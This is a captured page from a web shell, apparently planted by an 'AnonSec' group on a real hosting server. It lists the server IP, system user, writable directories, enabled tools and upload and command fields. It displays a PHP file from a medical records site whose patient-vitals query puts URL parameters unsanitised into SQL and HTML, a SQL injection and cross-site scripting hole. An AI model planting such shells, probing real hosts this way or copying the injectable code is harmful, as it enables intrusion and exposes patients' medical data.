Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.135.247.181
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//show_RequestforAdmissionvitals.php
<?php
  	$sql ="SELECT * FROM Medical_vitals WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    echo"  <table id='example2' class='table table-bordered table-hover'>
		    <tr><td colspan='2'><a href='Edit_RequestforAdmissionvitals.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&id=$rs[id]' style='font-size:20px; float:right;padding:20px;'>Edit</a></td></tr>
		    <tr><td width='50%'>BMI</td><td  width='50%'>$rs[Bmi]</td></tr>
		    <tr><td width='50%'>Weight</td><td  width='50%'>$rs[Wt]</td></tr>
<tr><td width='50%'>SPo2</td><td  width='50%'>$rs[SPo2]</td></tr>
<tr><td  width='50%'>RBS</td><td  width='50%'>$rs[RBS]</td></tr>
<tr><td  width='50%'>Temperature</td><td  width='50%'>$rs[Temp]</td></tr>
<tr><td  width='50%'>Pulse</td><td  width='50%'>$rs[Pulse]</td></tr>
<tr><td  width='50%'>Blood Pressure:</td><td  width='50%'>$rs[BP2]/$rs[BP]</td></tr>
<br>
    	</table>
	";
		}
		?>
	

Anon7 - 2022
AnonSec Team